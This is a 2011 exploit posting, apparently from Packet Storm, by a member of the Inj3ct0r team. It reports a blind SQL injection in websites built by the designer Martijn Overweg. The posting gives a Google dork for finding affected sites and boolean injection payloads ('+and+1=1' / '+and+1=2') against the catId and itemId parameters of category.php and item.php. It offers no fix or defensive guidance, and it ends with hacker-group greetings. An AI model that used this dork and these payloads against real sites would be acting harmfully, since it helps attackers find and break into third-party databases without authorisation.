Martijn Overweg Blind SQL Injection

2011-06-26T00:00:00
ID PACKETSTORM:102586
Type packetstorm
Reporter Kalashinkov3
Modified 2011-06-26T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm kalashinkov3 member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
#########################################################  
# Title : Martijn Overweg Blind SQL-i Vulnerability  
# Author: Kalashinkov3  
# Home : 13000 / ALGERIA   
# Website : 1337day.com / dis9.com  
# Vendor: www.overweg.com  
# Email : kalashinkov3[at]Hotmail[dot]Fr  
# Date : 25/06/2011  
# Google Dork : intext:"Webdesign: Martijn Overweg"  
# Category : Webapps  
#########################################################  
  
  
  
[+] Exploit :)  
  
# http://[localhost]/category.php?catId=1 ==> +and+1=1 [True]  
# http://[localhost]/category.php?catId=1 ==> +and+1=2 [False]  
  
  
# http://[localhost]/item.php?itemId=1 ==> +and+1=1 [True]  
# http://[localhost]/item.php?itemId=1 ==> +and+1=2 [False]  
  
  
^_^ G00d LUCK ALL :=)  
  
+ Greets To==================================================================+  
+   
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +  
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com +  
andhrahackers.com, 1337day.com/team, id-backtrack.com, dis9.com/team +  
# all Algerians Hacker'S ;), All My Friends # +  
=============================================================================+  
`